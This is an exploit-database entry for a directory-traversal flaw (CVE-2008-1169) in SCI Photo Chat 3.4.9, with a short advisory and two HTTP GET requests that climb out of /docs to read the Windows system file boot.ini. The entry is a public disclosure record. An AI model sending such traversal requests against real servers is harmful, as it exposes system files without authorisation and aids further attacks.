SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal
| EKU-ID: 36216 | CVE: CVE-2008-1169;OSVDB-43071 | OSVDB-ID: |
| Author: Luigi Auriemma | Published: 2008-02-19 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 36216 | CVE: CVE-2008-1169;OSVDB-43071 | OSVDB-ID: |
| Author: Luigi Auriemma | Published: 2008-02-19 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/27872/info SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks. This issue affects SCI Photo Chat 3.4.9 and prior versions. GET /docs/..\..\..\..\..\boot.ini HTTP/1.0 GET /docs/../../../../../boot.ini HTTP/1.0